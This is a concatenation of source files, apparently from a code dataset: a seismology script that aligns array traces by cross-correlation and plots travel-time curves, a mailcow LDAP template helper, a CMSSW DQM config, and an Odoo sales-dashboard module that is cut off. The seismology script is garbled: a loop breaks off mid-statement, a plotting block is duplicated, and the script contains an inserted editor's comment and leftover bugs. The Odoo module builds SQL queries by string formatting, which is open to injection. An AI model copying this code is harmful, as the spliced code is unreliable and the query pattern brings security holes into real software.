this_name_truc.upper()\n#\t\t\t\tprint(tr.stats.station + ' tr.stats.station ' +st_names[ii] + ' st_names[ii] ' + ref_trace + ' ref_trace ' + name_truc_cap + ' name_truc_cap ' + this_name + ' this_name ' + this_name_truc + ' this_name_truc')\n#\t\t\t\tif (tr.stats.station == name_truc_cap):# found it\n\t\t\t\tif (tr.stats.station == st_names[ii]):# found it\n\t\t\t\t\tprint(tr.stats.station + ' tr.stats.station ' +st_names[ii] + ' st_names[ii] ')\n#\t\t\t\t\tsys.exit()\n\t\t\t\t\tstalon = float(st_lons[ii]) # look up lat & lon again to find distance\n\t\t\t\t\tstalat = float(st_lats[ii])\n\t\t\t\t\tdistance = gps2dist_azimuth(stalat,stalon,ev_lat,ev_lon)\n\t\t\t\t\ttr_ref.stats.distance=distance[0]/(1000.*111) # distance in meters\n\t\t\t\t\tprint('depth ' + str(ev_depth) + ' distance ' + str(tr_ref.stats.distance) + ' phase ' + dphase)\n\t\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t=tr_ref.stats.distance,phase_list=[dphase])\n\t\t\t\t\ttry:\n\t\t\t\t\t\ttr_ref_tt = arrivals[0].time # arrival time\n\t\t\t\t\texcept:\n\t\t\t\t\t\tprint('Station ' + tr.stats.station + ' at distance ' + str(tr_ref.stats.distance) + ' and depth ' + str(ev_depth))\n\t\t\t\t\t\tsys.exit(\"No arrival time for \" + dphase)\n#\tsys.exit()\n\n\tstgood = Stream()\n\tst2 = st.copy() # hard to measure timing of traces without adjusting entire thing\n\tprint('st2 has: ' + str(len(st)) + ' traces' + ' t (origin time) ' + str(t))\n\n\t# get station lat-lon, compute distance for plot\n\tgood_corr = 0\n\tbad_corr = 0\n\tfor tr in st: # do all seismograms\n\t\tfor ii in station_index: # find station in inventory\n\t\t\ttested_name = st_names[ii]\n\t\t\tactual_trace = tr.stats.station\n\t\t\tif ARRAY == 0: # convoluted patch for long Hinet names\n\t\t\t\tthis_name_truc = tested_name[0:5]\n\t\t\t\tname_truc_cap = this_name_truc.upper()\n\t\t\t\tthis_name = name_truc_cap\n\t\t\t\tactual_trace = tr.stats.station.upper\n\t\t\tif (actual_trace == tested_name): # found it\n\t\t\t\ttr_time = tr.stats.starttime # tr_time apparently not used, a relic\n\t\t\t\tstalon = float(st_lons[ii]) # 
look up lat & lon to find distance\n\t\t\t\tstalat = float(st_lats[ii])\n\t\t\t\tdistance = gps2dist_azimuth(stalat,stalon,ev_lat,ev_lon)\n\t\t\t\ttr.stats.distance=distance[0]/(1000.*111) # distance for phase time and plotting\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t=tr.stats.distance,phase_list=[dphase])\n\t\t\t\tprint('made it to here!!')\n\t\t\t\ttry:\n\t\t\t\t\tdt, coeff = xcorr_pick_correction(t, tr_ref, t, tr,\n\t\t\t\t\t\t\tstart_corr_win, end_corr_win, max_time_shift, plot=plot_flag)\n\t\t\t\t\tprint('also made it to here!!')\n\t\t\t\t\tif dt > max_time_shift:\n\t\t\t\t\t\tprint('Hey! Excess shift: %.3f' % dt)\n\t\t\t\t\t\tprint('Station ' + tr.stats.station + ' corr is ' + str(coeff))\n\t\t\t\t\tif coeff > 1:\n\t\t\t\t\t\tprint('Hey! Excess coeff: %.3f' % coeff)\n\t\t\t\t\t\tprint('Station ' + tr.stats.station + ' corr is ' + str(coeff))\n\t\t\t\t\tif coeff > corr_threshold:\n\t\t\t\t\t\tgood_corr += 1\n\t\t\t\t\t\tif plot_flag == True:\n\t\t\t\t\t\t\tprint('Time correction for pick 2: %.6f' % dt)\n\t\t\t\t\t\t\tprint('Correlation coefficient: %.2f' % coeff)\n\t\t\t\t\t\ttr.stats.starttime -= dt\n\t\t\t\t\t\tsta_names.extend([tr.stats.station])\n\t\t\t\t\t\tsta_dists.extend([tr.stats.distance])\n\t\t\t\t\t\tsta_lats.extend([stalat])\n\t\t\t\t\t\tsta_lons.extend([stalon])\n\t\t\t\t\t\tsta_statics.extend([dt])\n\t\t\t\t\t\tsta_corrs.extend([coeff])\n\t\t\t\t\t\tstgood += tr\n\t\t\t\t\telse:\n\t\t\t\t\t\tbad_corr += 1\n\t\t\t\texcept:\n\t\t\t\t\tprint('No arrival time for ' + tr.stats.station + ' at distance ' + str(tr.stats.distance))\n\t\tsys.exit()\n\n\t##\t\t# store shift to write out\n\t##\t\t\tif coeff > corr_threshold:\n\t#\t\t\t# write out station_name, dt, coeff\n\t#\t\t\t# record shifted waveform in stgood\n\tprint(str(good_corr) + ' out of ' + str(good_corr + bad_corr) + ' are greater than ' + str(corr_threshold))\n\n\n\t#%%\n\t# plot traces\n\tplt.close(5)\n\tplt.figure(5,figsize=(10,10))\n\tplt.xlim(start_plot_win, end_plot_win)\n\tplt.ylim(min_dist, max_dist)\n\n\tfor tr in stgood:\n\t\tdist_offset = tr.stats.distance # trying for approx degrees\n\t\ttime = np.arange(len(tr.data)) * tr.stats.delta + (tr.stats.starttime - t)\n\t\tplt.plot(time, (tr.data - np.median(tr.data))*plot_scale_fac /(tr.data.max()\n\t\t\t- tr.data.min()) + dist_offset, color = 'black')\n\n\t\t#%% Plot traveltime curves\n\tif plot_tt:\n\t\t# first traveltime curve\n\t\tline_pts = 50\n\t\tdist_vec = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # distance grid\n\t\ttime_vec1 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\tfor i in range(0,line_pts):\n\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase])\n\t\t\tnum_arrivals = len(arrivals)\n\t\t\tfound_it = 0\n\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\tif arrivals[j].name == dphase:\n\t\t\t\t\ttime_vec1[i] = arrivals[j].time\n\t\t\t\t\tfound_it = 1\n\t\t\tif found_it == 0:\n\t\t\t\ttime_vec1[i] = np.nan\n\t# second traveltime curve\n\t\tif dphase2 != 'no':\n\t\t\ttime_vec2 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase2])\n\t\t\t\tnum_arrivals = 
len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase2:\n\t\t\t\t\t\ttime_vec2[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec2[i] = np.nan\n\t\t\tplt.plot(time_vec2,dist_vec, color = 'orange')\n\t\t# third traveltime curve\n\t\tif dphase3 != 'no':\n\t\t\ttime_vec3 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase3])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase3:\n\t\t\t\t\t\ttime_vec3[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec3[i] = np.nan\n\t\t\tplt.plot(time_vec3,dist_vec, color = 'yellow')\n\t\t# fourth traveltime curve\n\t\tif dphase4 != 'no':\n\t\t\ttime_vec4 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase4])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase4:\n\t\t\t\t\t\ttime_vec4[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec4[i] = np.nan\n\t\t\tplt.plot(time_vec4,dist_vec, color = 'purple')\n\n\t\tplt.plot(time_vec1,dist_vec, color = 'blue')\n\t\tplt.show()\n\n\tplt.xlabel('Time (s)')\n\tplt.ylabel('Epicentral distance from event (°)')\n\tplt.title('Post-alignment ' + dphase + ' for ' + fname[2:12])\n\tplt.show()\n\n\t#%%\n\t# plot traces before time shifts\n\tplt.close(6)\n\tplt.figure(6,figsize=(10,10))\n\tplt.xlim(start_plot_win, end_plot_win)\n\tplt.ylim(min_dist, max_dist)\n\n\tfor tr in st2: # regenerate distances into st2 as they were loaded into st for plots\n\t\tfor ii in station_index: # find station in inventory\n\t\t\ttested_name = st_names[ii]\n\t\t\tactual_trace = tr.stats.station\n\t\t\tif ARRAY == 0: # convoluted patch for long Hinet names\n\t\t\t\tthis_name_truc = tested_name[0:5]\n\t\t\t\tname_truc_cap = this_name_truc.upper()\n\t\t\t\tthis_name = name_truc_cap\n\t\t\t\tactual_trace = tr.stats.station.upper\n\t\t\tif (actual_trace == tested_name): # found it\n\t\t\t\tstalon = float(st_lons[ii]) # look up lat & lon to find distance\n\t\t\t\tstalat = float(st_lats[ii])\n\t\t\t\tdistance = gps2dist_azimuth(stalat,stalon,ev_lat,ev_lon)\n\t\t\t\ttr.stats.distance=distance[0]/(1000.*111) # distance for phase time and plotting\n\n\tfor tr in st2: # generate plot\n\t\tdist_offset = tr.stats.distance # trying for approx degrees\n\t\ttime = np.arange(len(tr.data)) * tr.stats.delta + (tr.stats.starttime - t)\n\t\tplt.plot(time, (tr.data - np.median(tr.data))*plot_scale_fac /(tr.data.max()\n\t\t\t- tr.data.min()) + dist_offset, color = 'black')\n\n\t\t#%% Plot traveltime curves\n\tif plot_tt:\n\t\t# first traveltime curve\n\t\tline_pts = 50\n\t\tdist_vec = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # distance grid\n\t\ttime_vec1 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\tfor i in 
\n\n\tfor tr in st2: # generate plot\n\t\tdist_offset = tr.stats.distance # trying for approx degrees\n\t\ttime = np.arange(len(tr.data)) * tr.stats.delta + (tr.stats.starttime - t)\n\t\tplt.plot(time, (tr.data - np.median(tr.data))*plot_scale_fac /(tr.data.max()\n\t\t\t- tr.data.min()) + dist_offset, color = 'black')\n\n\t\t#%% Plot traveltime curves\n\tif plot_tt:\n\t\t# first traveltime curve\n\t\tline_pts = 50\n\t\tdist_vec = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # distance grid\n\t\ttime_vec1 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\tfor i in range(0,line_pts):\n\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase])\n\t\t\tnum_arrivals = len(arrivals)\n\t\t\tfound_it = 0\n\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\tif arrivals[j].name == dphase:\n\t\t\t\t\ttime_vec1[i] = arrivals[j].time\n\t\t\t\t\tfound_it = 1\n\t\t\tif found_it == 0:\n\t\t\t\ttime_vec1[i] = np.nan\n\t\t# second traveltime curve\n\t\tif dphase2 != 'no':\n\t\t\ttime_vec2 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase2])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase2:\n\t\t\t\t\t\ttime_vec2[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec2[i] = np.nan\n\t\t\tplt.plot(time_vec2,dist_vec, color = 'orange')\n\t\t# third traveltime curve\n\t\tif dphase3 != 'no':\n\t\t\ttime_vec3 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase3])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase3:\n\t\t\t\t\t\ttime_vec3[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec3[i] = np.nan\n\t\t\tplt.plot(time_vec3,dist_vec, color = 'yellow')\n\t\t# fourth traveltime curve\n\t\tif dphase4 != 'no':\n\t\t\ttime_vec4 = np.arange(min_dist, max_dist, (max_dist - min_dist)/line_pts) # empty time grid of same length (filled with -1000)\n\t\t\tfor i in range(0,line_pts):\n\t\t\t\tarrivals = model.get_travel_times(source_depth_in_km=ev_depth,distance_in_degree\n\t\t\t\t\t\t\t\t\t\t\t=dist_vec[i],phase_list=[dphase4])\n\t\t\t\tnum_arrivals = len(arrivals)\n\t\t\t\tfound_it = 0\n\t\t\t\tfor j in range(0,num_arrivals):\n\t\t\t\t\tif arrivals[j].name == dphase4:\n\t\t\t\t\t\ttime_vec4[i] = arrivals[j].time\n\t\t\t\t\t\tfound_it = 1\n\t\t\t\tif found_it == 0:\n\t\t\t\t\ttime_vec4[i] = np.nan\n\t\t\tplt.plot(time_vec4,dist_vec, color = 'purple')\n\n\t\tplt.plot(time_vec1,dist_vec, color = 'blue')\n\t\tplt.show()\n\n\tplt.xlabel('Time (s)')\n\tplt.ylabel('Epicentral distance from event (°)')\n\tplt.title('Pre-alignment ' + dphase + ' for ' + fname[2:12])\n\tplt.show()\n\n\t# Save aligned traces\n\tfname_sfile = 'HA' + date_label[:10] + 'pro4_' + dphase + '.mseed'\n\tfname_stats = 'HA' + date_label[:10] + 'pro4_' + dphase + '.statics'\n\n\tfname_sfile = '/Users/vidale/Documents/Github/Array_codes/Files/' + fname_sfile\n\tfname_stats = '/Users/vidale/Documents/Github/Array_codes/Files/' + fname_stats\n\n\tstgood.write(fname_sfile,format = 'MSEED')\n\n\t# Save station static correction files\n\t#fname_stats = 'Statics' + etime[:10] + dphase + ref_trace + '.txt'\n\tstats_file = open(fname_stats, 'w')
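\n\t# Editor's note (hedged alternative): a with-open context manager on fname_stats\n\t# would close the statics file automatically instead of the explicit close below.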
\n\tlen_file1 = len(sta_names)\n\tfor j in range(0,len_file1):\n\t\tdist_str = '{:.2f}'.format( sta_dists[j]) # 2 digits after decimal place\n\t\tlat_str = '{:.4f}'.format( sta_lats[j]) # 4 digits after decimal place\n\t\tlon_str = '{:.4f}'.format( sta_lons[j])\n\t\tstat_str = '{:.3f}'.format(sta_statics[j])\n\t\tcorr_str = '{:.3f}'.format( sta_corrs[j])\n\t\twrite_line = sta_names[j] +' ' + dist_str +' ' + lat_str +' ' + lon_str +' ' + stat_str + ' ' + corr_str + '\\n'\n\t\tstats_file.write(write_line)\n\tstats_file.close()\n\tprint('Correlation files have: ' + str(len_file1) + ' traces')\n\n\tos.system('say \"Done\"')","repo_name":"JohnVidale/Array_codes","sub_path":"Process/pro4_get_shifts_LASA.py","file_name":"pro4_get_shifts_LASA.py","file_ext":"py","file_size_in_byte":16198,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"50"} +{"seq_id":"33625205734","text":"import logging, os\n\nfrom pathlib import Path\nfrom requests.exceptions import ConnectionError\n\ndef applyAllTemplates(config, dockerapi=None):\n    files = [\n        'dovecot/ldap/passdb.conf',\n        'dovecot/extra.conf',\n        'sogo/plist_ldap'\n    ]\n\n    configChanged = False\n    for file in files:\n        thisConfigChanged = _applyTemplate(file, config)\n        configChanged = configChanged or thisConfigChanged\n\n    if configChanged and dockerapi:\n        logging.info("One or more config files have been changed, restarting dovecot-mailcow and sogo-mailcow now!")\n        try:\n            dockerapi.waitForContainersToBeRunning(["sogo-mailcow", "dovecot-mailcow"])\n            dockerapi.restartContainer("sogo-mailcow")\n            dockerapi.restartContainer("dovecot-mailcow")\n        except:\n            print()\n            logging.warning("Could not restart containers because of an exception.")\n    elif not dockerapi:\n        logging.info("One or more config files have been changed, please make sure to restart dovecot-mailcow and sogo-mailcow!")\n\ndef _applyTemplate(filePath, config):\n\n    configFilePath = f"conf/{filePath}"\n    templateFilePath = f"templates/{filePath}"\n\n    with open(templateFilePath) as f:\n        templateData = f.read()\n\n    templateVariables = {\n        "ldapUri": config['LDAP_URI'],\n        "ldapBaseDn": config['LDAP_BASE_DN'],\n        "ldapBindDn": config['LDAP_BIND_DN'],\n        "ldapBindPassword": config['LDAP_BIND_DN_PASSWORD'],\n        "ldapUserFilter": config['LDAP_USER_FILTER'],\n        "ldapSogoUserFilter": config['LDAP_SOGO_USER_FILTER']\n    }\n    \n    for key, value in templateVariables.items():\n        templateData = templateData.replace(f"@@{key}@@", value)\n\n    if os.path.isfile(configFilePath):\n        with open(configFilePath) as f:\n            oldFileContents = f.read()\n\n        if oldFileContents.strip() == templateData.strip():\n            logging.info(f"Config file {configFilePath} unchanged")\n            return False\n\n        backupIndex = 1\n        backupFile = f"{configFilePath}.linuxmuster_mailcow_bak"\n        while os.path.exists(backupFile):\n            backupFile = f"{configFilePath}.linuxmuster_mailcow_bak.{backupIndex}"\n            backupIndex += 1\n\n        os.rename(configFilePath, backupFile)\n        logging.info(f"Backed up {configFilePath} to {backupFile}")\n\n    Path(os.path.dirname(configFilePath)).mkdir(parents=True, exist_ok=True)\n\n    print(templateData, file=open(configFilePath, 'w'))\n    \n    logging.info(f"Saved generated config file to {configFilePath}")\n    return True","repo_name":"netzint/linuxmuster-mailcow","sub_path":"src/templateHelper.py","file_name":"templateHelper.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"40140130190","text":"import FWCore.ParameterSet.Config as cms\n\nfrom DQMServices.Core.DQMEDAnalyzer import DQMEDAnalyzer\npfJetDQMAnalyzer = DQMEDAnalyzer('PFJetDQMAnalyzer',\n InputCollection = cms.InputTag('ak4PFJets'),\n MatchCollection = 
cms.InputTag('ak4CaloJets'),\n BenchmarkLabel = cms.string('ParticleFlow/PFVsCalo'),\n deltaRMax = cms.double(0.1),\n onlyTwoJets = cms.bool(False),\n matchCharge = cms.bool(False),\n mode = cms.int32( 1 ),\n CreatePFractionHistos = cms.bool(False),\n ptMin = cms.double( 0.0 ),\n ptMax = cms.double( 999999 ),\n etaMin = cms.double(-10),\n etaMax = cms.double(10),\n phiMin = cms.double(-3.14),\n phiMax = cms.double(3.14),\n# Histogram Parameters related to pt\n VariablePtBins = cms.vdouble(0.,1.,2.,5.,10.,20.,50.,100.,200.,400.,500.),\n PtHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(100),\n xMin = cms.double(0.0),\n xMax = cms.double(200.0)\n ),\n DeltaPtHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(100),\n xMin = cms.double(-100.0),\n xMax = cms.double(100.0)\n ),\n DeltaPtOvPtHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n BROn = cms.bool(False), BREtaMin = cms.double(0.0), BREtaMax = cms.double(1.4),\n EROn = cms.bool(False), EREtaMin = cms.double(1.6), EREtaMax = cms.double(2.4),\n slicingOn = cms.bool(False),\n nBin = cms.int32(200),\n xMin = cms.double(-3.0),\n xMax = cms.double(3.0)\n ),\n# Histogram Parameters related to Eta\n EtaHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(100),\n xMin = cms.double(-5.0),\n xMax = cms.double(5.0)\n ),\n DeltaEtaHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(50),\n xMin = cms.double(-0.2),\n xMax = cms.double(0.2)\n ),\n# Histogram Parameters related to Phi\n PhiHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(64),\n xMin = cms.double(-3.2),\n xMax = cms.double(3.2)\n ),\n DeltaPhiHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(50),\n xMin = cms.double(-0.2),\n xMax = cms.double(0.2)\n ),\n DeltaRHistoParameter = cms.PSet(\n switchOn = cms.bool(True),\n nBin = cms.int32(50),\n xMin = cms.double(0.0),\n xMax = cms.double(0.5)\n ),\n# Histogram Parameters related to Charge\n ChargeHistoParameter = cms.PSet(\n switchOn = cms.bool(False),\n nBin = cms.int32(3),\n xMin = cms.double(-1.5),\n xMax = cms.double(1.5)\n )\n)\n","repo_name":"cms-sw/cmssw","sub_path":"DQMOffline/PFTau/python/PFJetDQMAnalyzer_cfi.py","file_name":"PFJetDQMAnalyzer_cfi.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"en","doc_type":"code","stars":985,"dataset":"github-code","pt":"50"} +{"seq_id":"33991650987","text":"from odoo import api, fields, models, tools, _\nfrom odoo.http import Controller, request\nimport time, datetime\nfrom odoo.exceptions import UserError\nfrom odoo.tools import DEFAULT_SERVER_DATETIME_FORMAT\nfrom odoo.exceptions import ValidationError, RedirectWarning, except_orm\nfrom odoo.addons import decimal_precision as dp\nfrom odoo.tools.float_utils import float_is_zero, float_compare\nfrom odoo.tools import pycompat\nfrom odoo.tools.float_utils import float_round\nfrom datetime import timedelta\nimport datetime\nimport dateutil.relativedelta\nfrom datetime import datetime as dt\nfrom lxml import etree\nfrom threading import Timer\nimport random\n\n\nclass SalesDashboard(models.Model):\n _description = \"Sales Detail\"\n _name = \"sales.dashboard\"\n\n active = fields.Boolean('Active', default=True, store=True)\n name = fields.Selection([\n ('crm.enquiry', 'Enquiries'),\n ('sale.quotation', 'Quotations'),\n ('sale.order', 'Sales Orders'),\n ('pick', 'Pick'),\n ('sale.agreement', 'Sale Agreement'),\n ('res.partner', 'Customers'),\n ('sale.agreement', 'Sale 
Agreement'),\n ('product.template', 'Finish Goods'),\n ('pack', 'Pack'),\n ('dispatch', 'Dispatch')\n\n ], string=\"Name\")\n computation = fields.Char(compute=\"_computation\")\n user_id = fields.Many2one('res.users', 'User')\n company_id = fields.Many2one('res.company', 'Company')\n total = fields.Integer(\"Total\")\n pending = fields.Integer(\"Pending\")\n sent = fields.Integer(\"Sent\")\n color = fields.Integer('Color')\n view_type = fields.Boolean('Type', default=True)\n emp_id = fields.Integer(\"Employee Id\")\n approved = fields.Integer(\"Approved\")\n confirm = fields.Integer(\"Confirm\")\n cancel = fields.Integer(\"Cancel\")\n draft = fields.Integer(\"Draft\")\n hsn = fields.Integer(\"Not Having HSN\")\n not_validated = fields.Integer(\"Not Validated\")\n no_email = fields.Integer(\"Not Email\")\n ready = fields.Integer(\"Ready\")\n partially = fields.Integer(\"Partially\")\n amendment = fields.Integer(\"Amendment\")\n\n @api.multi\n def _computation(self):\n for record in self:\n if record.user_id.id == self.env.user.id and record.company_id.id == record.env.user.company_id.id:\n record.env.cr.execute(\"select * from sales_dashboard_query where model_name='%s'\" % (str(record.name)))\n model_data = record.env.cr.dictfetchall()\n if model_data:\n complete_data = {}\n for model in model_data:\n complete_data[model['label_name']] = (self.execute_management_query(model))\n record.sudo().write(\n {\n 'total': len(complete_data.get('total', 0) if complete_data.get('total', 0) != 0 else []),\n 'pending': len(complete_data.get('pending', 0) if complete_data.get('pending', 0) != 0 else []),\n 'approved': len(complete_data.get('approved', 0) if complete_data.get('approved', 0) != 0 else []),\n 'sent': len(complete_data.get('sent', 0) if complete_data.get('sent', 0) != 0 else []),\n 'confirm': len(complete_data.get('confirm', 0) if complete_data.get('confirm', 0) != 0 else []),\n 'cancel': len(complete_data.get('cancel', 0) if complete_data.get('cancel', 0) != 0 else []),\n 'draft': len(complete_data.get('draft', 0) if complete_data.get('draft', 0) != 0 else []),\n 'hsn': len(complete_data.get('hsn', 0) if complete_data.get('hsn', 0) != 0 else []),\n 'not_validated': len(complete_data.get('not_validated', 0) if complete_data.get('not_validated', 0) != 0 else []),\n 'no_email': len(complete_data.get('no_email', 0) if complete_data.get('no_email', 0) != 0 else []),\n 'ready': len(complete_data.get('ready', 0) if complete_data.get('ready', 0) != 0 else []),\n 'partially': len(complete_data.get('partially', 0) if complete_data.get('partially', 0) != 0 else []),\n 'amendment': len(complete_data.get('amendment', 0) if complete_data.get('amendment', 0) != 0 else []),\n 'color': random.choice([1, 2, 3, 4, 5, 6, 7, 8, 9])\n }\n )\n\n def execute_management_query(self, query_model):\n list_query_dict = {}\n company_id = self.env.user.company_id.id\n query = str(query_model[\"query\"]) + str(company_id)\n if query:\n self.env.cr.execute(query)\n list_query_dict = self.env.cr.dictfetchall()\n return list_query_dict\n\n @api.model\n def create_card_for_sales_user(self):\n model_names = []\n users = self.env[\"res.users\"].search([(\"id\", \">\", 0)])\n names = self.env[\"sales.dashboard.query\"].search([(\"id\", \">\", 0)])\n for name in names:\n model_names.append(name.model_name)\n model_names = set(model_names)\n for user in users:\n for company in user.company_ids:\n for name in model_names:\n self.env['sales.dashboard'].create({\"name\": name, \"user_id\": user.id,\n \"company_id\": 
company.id})\n\n @api.multi\n def compute_by_scheduler(self):\n return {\n 'type': 'ir.actions.window',\n 'tag': 'reload',\n }\n\n @api.multi\n def get_list_view(self):\n obj_list = []\n result = {}\n label_name = self._context.get(\"label_name\")\n self.env.cr.execute(\"select * from sales_dashboard_query where model_name='%s' and label_name='%s'\" % (str(self.name), label_name))\n model_data = self.env.cr.dictfetchall()\n if model_data:\n total_data = self.execute_management_query(model_data[0])\n if total_data:\n name = self.name\n if name in ['pick', 'pack', 'dispatch']:\n name = 'stock.picking'\n if name == 'sale.order' and label_name == 'amendment':\n name = 'sale.order.amend.new'\n for obj in total_data:\n obj_list.append(self.env[name].search([(\"id\", \"=\", obj[\"id\"])]).id)\n if self.name:\n if self.name == 'sale.order':\n if label_name == 'amendment':\n action = self.env.ref('crm_extension.action_sale_order_amend_new')\n else:\n action = self.env.ref('crm_extension.action_orders_new')\n elif self.name == 'res.partner':\n action = self.env.ref('base.action_partner_form')\n elif self.name == 'pick':\n action = self.env.ref('crm_extension.action_picking_so_transfer')\n elif self.name == 'pack':\n action = self.env.ref('crm_extension.action_picking_arkes_pack')\n elif self.name == 'dispatch':\n action = self.env.ref('crm_extension.action_picking_arkes_dispatch_advice')\n else:\n action = self.env[\"ir.actions.act_window\"].search([(\"res_model\", \"=\", self.name)])\n if self.name == 'sale.quotation':\n res = self.env.ref('crm_extension.sale_quotation_tree').id\n res_form = self.env.ref('crm_extension.sale_quotation_form').id\n elif self.name == 'sale.order':\n if label_name == 'amendment':\n res = self.env.ref('crm_extension.sale_order_amend_new_tree').id\n res_form = self.env.ref('crm_extension.sale_order_amend_new_form').id\n else:\n res = self.env.ref('sale.view_order_tree').id\n res_form = self.env.ref('sale.view_order_form').id\n elif self.name == 'res.partner':\n res = self.env.ref('base.view_partner_tree').id\n res_form = self.env.ref('base.view_partner_form').id\n elif self.name == 'pick':\n res = self.env.ref('crm_extension.so_transfer_new_tree').id\n res_form = self.env.ref('crm_extension.view_stock_picking_transfer_so_form').id\n elif self.name == 'pack':\n res = self.env.ref('crm_extension.so_transfer_new_tree').id\n res_form = self.env.ref('crm_extension.view_stock_picking_pack_new_form').id\n elif self.name == 'dispatch':\n res = self.env.ref('crm_extension.so_transfer_new_tree').id\n res_form = self.env.ref('crm_extension.view_stock_picking_pack_new_form').id\n else:\n res = self.env[\"ir.ui.view\"].search([(\"model\", \"=\", self.name), (\"type\", \"in\", (\"list\", \"tree\"))])[0].id\n res_form = self.env[\"ir.ui.view\"].search([(\"model\", \"=\", self.name), (\"type\", \"=\", \"form\")])[0].id\n result = action[0].read()[0]\n result['views'] = [(res, 'list'), (res_form, 'form')]\n result['domain'] = [('id', 'in', obj_list)]\n result['target'] = 'current'\n return result\n\n @api.multi\n def change_view_type(self):\n self.view_type = self._context.get(\"view_type\")\n\n\nclass SalesDashboardQuery(models.Model):\n _description = \"Query Detail\"\n _name = \"sales.dashboard.query\"\n\n model_name = fields.Char(\"Model Name\")\n label_name = fields.Char(\"Label Name\")\n query = fields.Text(\"Query\")\n col_name = fields.Char(\"Column Name\")\n\n @api.model\n def create(self, vals):\n if 'model_name' in vals and vals.get('model_name') and 'label_name' in vals and 
